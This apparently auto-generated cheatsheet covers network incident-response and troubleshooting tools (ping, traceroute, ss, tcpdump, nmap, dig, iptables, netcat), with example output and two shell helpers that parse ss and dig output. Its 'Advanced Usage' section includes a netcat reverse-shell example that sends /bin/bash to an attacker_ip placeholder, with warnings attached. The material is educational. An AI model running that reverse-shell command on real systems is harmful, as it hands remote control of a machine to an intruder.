Network Security Incident Response
Category: Network Troubleshooting
Type: Network Tools & Commands
Generated on: 2025-07-11 01:39:49
For: Network Engineering, Administration & Technical Interviews
This cheatsheet provides a practical guide to network tools and commands for incident response, focusing on network troubleshooting and security investigations.
1. Tool Overview:
| Tool | Description | Use Cases |
|---|---|---|
| ping | Tests network connectivity to a host. | Basic connectivity testing, latency measurement. |
| traceroute / tracert | Maps the path packets take to a destination. | Identifying network bottlenecks, routing issues, geolocation. |
| netstat / ss | Displays active network connections, listening ports, and routing tables. | Identifying malicious connections, port scanning, service discovery. |
| tcpdump / Wireshark | Captures and analyzes network traffic. | Packet analysis, protocol decoding, identifying suspicious traffic. |
| nmap | Network mapper; scans ports and identifies services. | Network discovery, vulnerability assessment, identifying open ports. |
| dig / nslookup | DNS lookup tools. | DNS resolution troubleshooting, verifying DNS records, identifying DNS servers. |
| arp | Displays and modifies the Address Resolution Protocol (ARP) cache. | Identifying MAC addresses associated with IP addresses, detecting ARP spoofing. |
| iptables / firewalld / Windows Firewall | Configures firewall rules. | Blocking malicious traffic, limiting access to services. |
| route | Displays and modifies the routing table. | Troubleshooting routing issues, adding static routes. |
| whois | Retrieves domain registration information. | Identifying domain owners, geolocation, abuse reporting. |
| curl / wget | Transfers data from or to a server. | Testing web server connectivity, downloading files, accessing APIs. |
| netcat (nc) | Reads and writes data across network connections. | Port scanning, creating reverse shells, testing network services. |
2. Basic Syntax:
- ping: `ping [options] <hostname or IP>`
- traceroute: `traceroute [options] <hostname or IP>` (Linux/macOS), `tracert <hostname or IP>` (Windows)
- netstat: `netstat [options]` (deprecated on Linux; use `ss`)
- ss: `ss [options]`
- tcpdump: `tcpdump [options] <filter expression>`
- nmap: `nmap [options] <target(s)>`
- dig: `dig [options] <hostname> <query type>`
- nslookup: `nslookup <hostname>`
- arp: `arp [options] <IP address>`
- iptables: `iptables [options] <chain> <rule>` (Linux)
- firewalld: `firewall-cmd [options]` (Linux)
- route: `route [options]` (Linux/macOS), `route print` (Windows)
- whois: `whois <domain>`
- curl: `curl [options] <URL>`
- wget: `wget [options] <URL>`
- netcat (nc): `nc [options] <hostname> <port>`
3. Practical Examples:
- ping:

```console
$ ping google.com
PING google.com (142.250.184.142) 56(84) bytes of data.
64 bytes from fra16s54-in-f14.1e100.net (142.250.184.142): icmp_seq=1 ttl=117 time=7.59 ms
64 bytes from fra16s54-in-f14.1e100.net (142.250.184.142): icmp_seq=2 ttl=117 time=7.57 ms
```

- traceroute/tracert:

```console
$ traceroute google.com
traceroute to google.com (142.250.184.142), 30 hops max, 60 byte packets
 1  192.168.1.1 (192.168.1.1)  1.021 ms  1.112 ms  1.158 ms
 2  10.0.0.1 (10.0.0.1)  3.234 ms  3.278 ms  3.319 ms
 3  ...
```

On Windows:

```console
> tracert google.com
```

- netstat/ss:

```console
$ netstat -ant | grep :80
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.100:443       172.217.160.142:443     ESTABLISHED
```

```console
$ ss -ant | grep :80
```

- tcpdump:

```console
$ tcpdump -i eth0 -n port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
14:32:12.123456 IP 192.168.1.100.50000 > 172.217.160.142.80: Flags [S], seq 1234567890, win 65535, options [mss 1460,nop,wscale 7,nop,nop,TS val 123456789,TS ecr 0,sackOK,eol], length 0
```

- nmap:

```console
$ nmap -sV 192.168.1.100
Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-27 14:33 EDT
Nmap scan report for 192.168.1.100
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p0 Ubuntu 7ubuntu2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
```

- dig:

```console
$ dig google.com

; <<>> DiG 9.11.5-P4-5.1+deb10u2 <<>> google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12345
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;google.com.                    IN      A

;; ANSWER SECTION:
google.com.             299     IN      A       142.250.184.142

;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Oct 27 14:34:00 EDT 2023
;; MSG SIZE  rcvd: 55
```

- arp:

```console
$ arp -a
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.100) at aa:bb:cc:dd:ee:ff [ether] on eth0
```

- iptables:

```console
$ iptables -A INPUT -s 192.168.1.10 -j DROP
```

(Drops all traffic from 192.168.1.10 – USE WITH CAUTION!)

- route:

```console
$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0
```

- whois:

```console
$ whois google.com
```

- curl:

```console
$ curl -I google.com
HTTP/2 200
date: Fri, 27 Oct 2023 18:35:00 GMT
expires: -1
cache-control: private, max-age=0
content-type: text/html; charset=ISO-8859-1
server: gws
...
```

- wget:

```console
$ wget https://example.com/file.txt
```

- netcat (nc):

```console
$ nc -zv google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
```
4. Common Options:
- ping:
  - `-c <count>`: Send only the specified number of ECHO_REQUEST packets.
  - `-t <ttl>`: Set the IP Time to Live (Linux; on Windows `-t` instead means ping until stopped). Higher TTL can bypass some firewalls.
- traceroute/tracert:
  - `-m <max_hops>`: Specify the maximum number of hops.
  - `-I`: Use ICMP for probes (traceroute).
- netstat/ss:
  - `-a`: Show all sockets (listening and non-listening).
  - `-n`: Show numerical addresses instead of resolving hostnames.
  - `-t`: Show TCP connections.
  - `-u`: Show UDP connections.
  - `-p`: Show the PID and name of the program to which each socket belongs. (Requires root privileges)
  - `ss -lntu`: List all listening TCP/UDP ports numerically.
- tcpdump:
  - `-i <interface>`: Specify the network interface to listen on (e.g., `eth0`, `wlan0`).
  - `-n`: Don't resolve hostnames.
  - `-nn`: Don't resolve hostnames or port names.
  - `-v` / `-vv` / `-vvv`: Increase verbosity.
  - `-w <file>`: Write the raw packets to a file for later analysis.
  - `-r <file>`: Read packets from a file.
  - `-s <snaplen>`: Specify the snapshot length (amount of data to capture for each packet). `-s 0` captures the entire packet.
- nmap:
  - `-sS`: TCP SYN scan (stealth scan).
  - `-sT`: TCP connect scan (requires a full TCP connection).
  - `-sU`: UDP scan.
  - `-sV`: Version detection.
  - `-p <port(s)>`: Specify port(s) to scan, e.g., `-p 80,443,22` or `-p 1-1000`.
  - `-O`: OS detection.
  - `-A`: Aggressive scan (enables OS detection, version detection, script scanning, and traceroute).
  - `-T<0-5>`: Timing template (0=paranoid, 1=sneaky, 2=polite, 3=normal, 4=aggressive, 5=insane).
  - `--script <script(s)>`: Run NSE scripts, e.g., `--script http-enum`.
- dig:
  - `+trace`: Trace the DNS resolution path.
  - `<query type>`: Specify the DNS record type (e.g., `A`, `MX`, `TXT`, `NS`).
- nslookup:
  - `server <dns server>`: Specify the DNS server to use.
- arp:
  - `-n`: Show numerical addresses.
  - `-d <IP address>`: Delete an ARP entry. (Requires root privileges)
  - `-s <IP address> <MAC address>`: Manually add an ARP entry. (Requires root privileges)
- iptables/firewalld:
  - `-A <chain>`: Append a rule to the specified chain (e.g., `INPUT`, `OUTPUT`, `FORWARD`).
  - `-I <chain> <rule number>`: Insert a rule at the specified position in the chain.
  - `-D <chain> <rule number>`: Delete a rule.
  - `-L <chain>`: List rules in the specified chain.
  - `-j <target>`: Specify the target for a rule (e.g., `ACCEPT`, `DROP`, `REJECT`).
  - `-s <source>`: Specify the source IP address or network.
  - `-d <destination>`: Specify the destination IP address or network.
  - `-p <protocol>`: Specify the protocol (e.g., `tcp`, `udp`, `icmp`).
  - `--dport <port>`: Specify the destination port.
  - `--sport <port>`: Specify the source port.
- route:
  - `-n`: Display numerical addresses.
  - `add default gw <gateway IP>`: Add a default gateway. (Requires root privileges)
  - `add -net <network/mask> gw <gateway IP>`: Add a route to a specific network. (Requires root privileges)
  - `del default gw <gateway IP>`: Delete the default gateway. (Requires root privileges)
- curl/wget:
  - `-I`: Show only the HTTP headers.
  - `-O`: Save the downloaded file with the same name as the remote file.
  - `-o <filename>`: Save the downloaded file with a specified name.
  - `-A <user-agent>`: Set the User-Agent header.
- netcat (nc):
  - `-l`: Listen for incoming connections.
  - `-p <port>`: Specify the port to listen on or connect to.
  - `-v`: Verbose mode.
  - `-z`: Zero-I/O mode (used for port scanning).
  - `-n`: Numeric-only IP addresses, no DNS lookup.
  - `-e <program>`: Execute a program after connection. (SECURITY RISK! AVOID IN PRODUCTION)
5. Advanced Usage:
- tcpdump with BPF (Berkeley Packet Filter):

```console
$ tcpdump -i eth0 'tcp port 80 and host 192.168.1.100' -w http_traffic.pcap
```

(Captures all TCP traffic on port 80 to/from 192.168.1.100 and saves it to http_traffic.pcap)

- nmap NSE (Nmap Scripting Engine):

```console
$ nmap --script vuln 192.168.1.100
```

(Runs vulnerability scanning scripts against 192.168.1.100)

- netcat Reverse Shell (Example - DO NOT USE ON UNTRUSTED NETWORKS):

Attacker (listening):

```console
$ nc -lvnp 4444
```

Victim (compromised machine):

```console
$ nc <attacker_ip> 4444 -e /bin/bash
```

(EXTREMELY DANGEROUS! ONLY USE IN CONTROLLED TESTING ENVIRONMENTS!)

- Combining tools with pipes:

```console
$ ss -ant | grep ESTAB | awk '{print $5}' | cut -d':' -f1 | sort | uniq -c | sort -nr | head -n 10
```

(Lists the top 10 most frequent remote IP addresses connected to the system via TCP. Note that `ss` prints the state as `ESTAB`, not `ESTABLISHED`, so `grep ESTAB` is used; it matches both spellings.)
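The pipeline above breaks on IPv6 peers, because `cut -d':' -f1` truncates an address such as `[2001:db8:1::5]:55000` at its first colon. The following is an added example (not part of the original cheatsheet) that does the same ranking as a shell function, strips only the trailing port, and also tallies sockets per state. The `ss -ant` output it runs on is constructed for the example, not a real capture.

```shell
# Added example, not from the original cheatsheet: the "top remote peers"
# pipeline as a function that also handles bracketed IPv6 peers.
# `ss -ant` columns: State Recv-Q Send-Q Local-Address:Port Peer-Address:Port

# Constructed `ss -ant` output (not a real capture).
SAMPLE_SS='State     Recv-Q Send-Q Local Address:Port     Peer Address:Port
LISTEN    0      128    0.0.0.0:22             0.0.0.0:*
ESTAB     0      0      192.168.1.100:443      172.217.160.142:443
ESTAB     0      0      192.168.1.100:52010    203.0.113.7:443
ESTAB     0      0      192.168.1.100:52011    203.0.113.7:443
ESTAB     0      0      192.168.1.100:52012    203.0.113.7:80
ESTAB     0      0      [2001:db8::10]:443     [2001:db8:1::5]:55000
ESTAB     0      0      [2001:db8::10]:443     [2001:db8:1::5]:55001
TIME-WAIT 0      0      192.168.1.100:52013    198.51.100.9:443'

# top_remote_ips SS_OUTPUT [N]: print "count peer" for the N most frequent
# peers of established TCP connections (default N=10), most frequent first.
top_remote_ips() {
    printf '%s\n' "$1" | awk '
        $1 == "ESTAB" {
            peer = $5
            sub(/:[^:]*$/, "", peer)      # drop only the trailing :port
            gsub(/\[|\]/, "", peer)       # drop the brackets around IPv6 addresses
            count[peer]++
        }
        END { for (p in count) printf "%d %s\n", count[p], p }
    ' | sort -k1,1nr -k2 | head -n "${2:-10}"
}

# conn_state_counts SS_OUTPUT: number of sockets per state (LISTEN, ESTAB,
# TIME-WAIT, ...), skipping the header line.
conn_state_counts() {
    printf '%s\n' "$1" | awk 'NR > 1 { count[$1]++ }
        END { for (s in count) printf "%s %d\n", s, count[s] }' | sort
}

# Live use: top_remote_ips "$(ss -ant)" 10
top_remote_ips "$SAMPLE_SS" 10
conn_state_counts "$SAMPLE_SS"
```

A sudden rise in one peer's connection count, or in `TIME-WAIT`/`SYN-RECV` totals, is the kind of change worth comparing against a baseline taken when the host was known-good.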
6. Troubleshooting Scenarios:
| Scenario | Tools/Commands | Steps | Expected Output/Action |
|---|---|---|---|
| Cannot reach a website | ping, traceroute, dig, curl, nslookup | 1. ping the website to check basic connectivity. 2. traceroute to identify the point of failure. 3. dig or nslookup to check DNS resolution. 4. curl -I to check HTTP status. | 1. “Destination Host Unreachable” indicates a network issue. 2. Identify the last reachable hop. 3. Verify that the website’s IP address is resolving correctly. 4. 200 OK indicates the server is responding. |
| Slow network performance | ping, traceroute, tcpdump, netstat, ss | 1. ping to check latency. 2. traceroute to identify slow hops. 3. tcpdump to capture and analyze traffic for bottlenecks. 4. netstat or ss to identify high connection counts. | 1. High ping times indicate network congestion. 2. Identify routers with high latency. 3. Look for excessive retransmissions or large packets. 4. Identify services with a large number of established connections. |
| Suspicious network activity | netstat, ss, tcpdump, nmap, iptables | 1. netstat or ss to identify suspicious connections. 2. tcpdump to capture and analyze traffic from/to suspicious IPs. 3. nmap to scan suspicious hosts. 4. iptables to block malicious traffic. | 1. Identify connections to unknown or malicious IP addresses. 2. Analyze traffic for malware signatures or unusual protocols. 3. Identify open ports and running services. 4. Block traffic from known malicious sources. |
| DNS resolution issues | dig, nslookup | 1. dig or nslookup the domain. 2. Check the DNS server being used. 3. Try a different DNS server (e.g., 8.8.8.8). | 1. “Server can’t find domain: NXDOMAIN” indicates a DNS problem. 2. Verify the DNS server is functioning correctly. 3. If a different DNS server works, the problem is with the original DNS server. |
| ARP spoofing | arp, tcpdump | 1. arp -a to examine the ARP cache. 2. tcpdump to capture ARP traffic. | 1. Look for multiple IP addresses associated with the same MAC address. 2. Analyze ARP requests and responses for suspicious activity. |
7. Output Interpretation:
- ping: `time=<value>` is the round-trip time (latency). `ttl=` is the Time To Live, which decreases by one at each hop.
- traceroute: Shows the path packets take, with latency for each hop. `* * *` means no reply was received from that hop within the timeout (the probes were dropped or filtered).
- netstat/ss: `LISTEN` indicates a service is listening for connections. `ESTABLISHED` (`ESTAB` in ss) indicates an active connection. `TIME_WAIT` indicates a connection that has been closed but is still waiting for late packets.
- tcpdump: Analyze the captured packets using Wireshark or `tcpdump -r <file>` with filters. Look for suspicious protocols, source/destination IPs, and flags.
- nmap: `open` indicates a port is listening for connections. `filtered` indicates a port is blocked by a firewall. `closed` indicates a port is reachable but not listening.
- dig: The `ANSWER SECTION` contains the resolved IP address(es) for the domain.
- arp: Shows the mapping between IP addresses and MAC addresses.
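To script the DNS checks from section 6 (status of the reply, the records in the ANSWER SECTION, and a fallback to another resolver), here is an added example, not part of the original cheatsheet, that parses `dig` output. Both `dig` replies below are constructed to match the format shown in section 3; the NXDOMAIN reply and the second A record are illustrative, not real lookups.

```shell
# Added example, not from the original cheatsheet: a small parser for dig
# output so DNS checks can be scripted instead of read by eye.

# Constructed successful reply (second A record added for illustration).
SAMPLE_DIG_OK='; <<>> DiG 9.11.5-P4-5.1+deb10u2 <<>> google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12345
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;google.com.            IN      A

;; ANSWER SECTION:
google.com.     299     IN      A       142.250.184.142
google.com.     299     IN      A       142.250.184.110

;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Fri Oct 27 14:34:00 EDT 2023
;; MSG SIZE  rcvd: 87'

# Constructed NXDOMAIN reply: no ANSWER SECTION, only the zone SOA in AUTHORITY.
SAMPLE_DIG_NX='; <<>> DiG 9.11.5-P4-5.1+deb10u2 <<>> nosuchhost.example
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 4242
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;nosuchhost.example.    IN      A

;; AUTHORITY SECTION:
example.        3600    IN      SOA     ns.example. hostmaster.example. 1 7200 3600 1209600 3600

;; Query time: 4 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)'

# dig_status DIG_OUTPUT: the response code from the HEADER line
# (NOERROR, NXDOMAIN, SERVFAIL, REFUSED, ...).
dig_status() {
    printf '%s\n' "$1" | sed -n 's/^;; ->>HEADER<<- .*status: \([A-Z]*\).*/\1/p'
}

# dig_answers DIG_OUTPUT [TYPE]: the rdata of each ANSWER SECTION record,
# optionally restricted to one record type (A, AAAA, MX, ...). Multi-field
# rdata such as MX "10 mail.example." is printed whole.
dig_answers() {
    printf '%s\n' "$1" | awk -v want="${2:-}" '
        /^;; ANSWER SECTION:/ { in_ans = 1; next }
        /^;;/ || /^$/          { in_ans = 0 }
        in_ans && (want == "" || $4 == want) {
            out = $5
            for (i = 6; i <= NF; i++) out = out " " $i
            print out
        }'
}

# dns_resolves DIG_OUTPUT: succeed only when the status is NOERROR and at
# least one A record came back; anything else is the "DNS problem" case.
dns_resolves() {
    [ "$(dig_status "$1")" = "NOERROR" ] && [ -n "$(dig_answers "$1" A)" ]
}

# Live use, falling back to a public resolver as section 6 step 3 suggests:
#   dns_resolves "$(dig example.com)" || dns_resolves "$(dig @8.8.8.8 example.com)"
dig_status "$SAMPLE_DIG_OK"
dig_answers "$SAMPLE_DIG_OK" A
```

If the local resolver returns NXDOMAIN or SERVFAIL while the public resolver answers, the fault is on the local DNS server; if both agree, the record itself is the problem.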
8. Security Considerations:
- nmap: Aggressive scans can be detected by intrusion detection systems (IDS). Use timing templates carefully.
- tcpdump: Capturing sensitive data (e.g., passwords) is possible. Store capture files securely.
- iptables/firewalld: Incorrectly configured firewall rules can block legitimate traffic. Test changes carefully. Always have a way to revert changes.
- netcat: The `-e` option is a major security risk. Avoid using it. Netcat can be used to create backdoors. Monitor for unauthorized use.
- General: Always use the principle of least privilege. Run network tools with the minimum necessary privileges. Monitor network traffic for suspicious activity. Keep your systems patched and up-to-date. Securely store any captured network data.
9. Platform Differences:
- traceroute: The command is `traceroute` on Linux/macOS and `tracert` on Windows.
- netstat: Deprecated on Linux; use `ss` instead.
- Firewall: Linux uses `iptables` or `firewalld`, Windows uses Windows Firewall, and macOS uses `pfctl`.
- arp: Syntax and options may vary slightly between platforms.
- Pathnames: File paths differ (e.g., `/bin/bash` on Linux vs. `C:\Windows\System32\cmd.exe` on Windows).
This cheatsheet provides a foundation for network security incident response and troubleshooting. Remember to adapt these tools and techniques to your specific environment and security policies. Always prioritize safety and security when using these commands.